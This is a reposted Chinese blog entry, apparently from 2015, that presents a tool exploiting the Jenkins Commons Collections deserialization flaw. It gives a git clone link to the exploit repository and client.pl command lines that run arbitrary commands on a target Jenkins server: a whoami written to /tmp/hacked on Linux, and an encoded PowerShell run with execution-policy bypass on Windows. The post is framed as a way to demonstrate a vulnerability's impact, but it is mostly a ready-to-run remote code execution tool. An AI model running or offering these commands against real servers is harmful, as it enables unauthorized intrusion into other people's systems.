Topic Center

Contact Sales

首頁 > 開發者 > Go

[轉]Jenkins CommonCollections 完美利用（示範）工具

最後更新：2015-12-04 來源：互聯網

上載者：User

創建阿里雲帳戶，並獲得超過 40 款產品的免費試用版；而企業帳戶則可以享有總值 $1200 的免費試用版。立即註冊！

標籤：

博主URL：http://tools.changesec.com/Jenkins-CommonCollections-Exploit/

提交漏洞總是要證明漏洞危害，老外寫的java代碼又有bug，所以隨手改掉了

點擊這裡下載代碼，或者使用如下命令

git clone https://github.com/CaledoniaProject/jenkins-cli-exploit.git

來張吧，

工具的具體使用方法，

如果目標是 Linux、Mac 機器，請使用，

./client.pl --url http://127.0.0.1:8080/jenkins/ --os linux --cmd ‘{ whoami; ls -lh; } > /tmp/hacked‘

如果是 Windows 機器，

./client.pl --url http://127.0.0.1:8080/jenkins/ --os win --cmd ‘powershell -ep bypass -enc xxxxx‘

環境要求，

確保你安裝了 java、perl
確保你安裝了 IPC::Run 這個PERL模組，安裝方法為 cpan IPC::Run

編寫於 November 15, 2015

[轉]Jenkins CommonCollections 完美利用（示範）工具

本文章原先以中文撰寫並發佈於 aliyun.com，亦設英文版本，僅作資訊用途。本網站不對文章的準確性，完整性或可靠性或其任何翻譯作出任何明示或暗示的陳述或保證。如對該文章有任何疑慮或投訴，請傳送電郵至 info-contact@alibabacloud.com 並提供相關疑慮或投訴的詳細說明。職員會於 5 個工作天內與您聯絡，一經驗證之後，即會刪除該侵權內容。

聯繫我們

該頁面正文內容均來源於網絡整理，並不代表阿里雲官方的觀點，該頁面所提到的產品和服務也與阿里云無關，如果該頁面內容對您造成了困擾，歡迎寫郵件給我們，收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容，歡迎發送郵件至： info-contact@alibabacloud.com 進行舉報並提供相關證據，工作人員會在 5 個工作天內聯絡您，一經查實，本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

[轉]Jenkins CommonCollections 完美利用（示範）工具

聯繫我們

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support